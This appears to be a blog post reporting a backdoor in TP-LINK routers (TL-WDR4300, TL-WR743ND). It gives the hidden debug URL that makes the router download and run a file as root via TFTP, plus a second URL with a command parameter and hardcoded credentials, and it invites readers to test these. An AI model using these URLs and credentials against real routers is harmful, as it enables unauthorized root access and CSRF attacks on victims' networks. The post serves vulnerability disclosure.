Back to Home

Backdoor in TP-LINK routers

backdoor · backdoors · vulnerability · tp-link

Backdoor in TP-LINK routers

    Polish security expert Michał Sajdak from Securitum found a very interesting backdoor in TP-LINK routers.

    The operation of the backdoor is quite simple, and its essence is shown in the following illustration:



    Instruction:
    1. The user makes an HTTP request:
      http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
    2. The router connects to the IP address that made this request and tries to find the TFTP server.
    3. If a TFTP server is found, the router downloads the file "nart.out"
    4. The downloaded file is run with root privileges.

    Most likely, this backdoor can only be used within the network.
    The backdoor contains the following router models: TL-WDR4300, TL-WR743ND (v1.2 v2.0). However, this list may not be complete.
    Original: link

    UPDATE from me:
    In addition to the URL above, the firmware for TL-WDR4300 contains two more:


    Processing the HTTP request to /userRpm/DebugResultRpm.htm:


    As we can see, the script has three parameters:
    / userRpm / DebugResultRpm. htm? cmd = CMD & wan_bpa_usr = osteam & passwd = 5up

    If the command is really executed when this URL is requested, this makes it possible to perform a beautiful CSRF attack (for example, change the routing or change the hosts file).
    We need volunteers with TP-Link to check this URL.

    Read Next